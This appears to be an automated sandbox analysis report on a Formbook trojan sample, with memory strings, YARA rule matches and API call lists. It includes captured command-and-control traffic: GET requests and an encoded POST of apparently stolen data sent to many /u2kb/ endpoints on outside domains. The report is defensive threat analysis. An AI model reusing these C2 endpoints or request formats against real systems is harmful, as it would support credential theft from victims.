Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578840779.000000000DA97000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/
Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm
Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
Source: HI4NJ046K.6.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/domain-registrieren.html
Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
Source: HI4NJ046K.6.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HI4NJ046K.6.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: unknown HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
Source: unknown DNS traffic detected: queries for: www.white-hat.uk
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: mcwfy.exe, 00000001.00000002.314796170.000000000067A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud

Source: Yara match File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: u8QPnVhq0N.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00410331 1_2_00410331
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_020608B7 1_2_020608B7
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_02060A3B 1_2_02060A3B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040C043 3_2_0040C043
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00405873 3_2_00405873
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401824 3_2_00401824
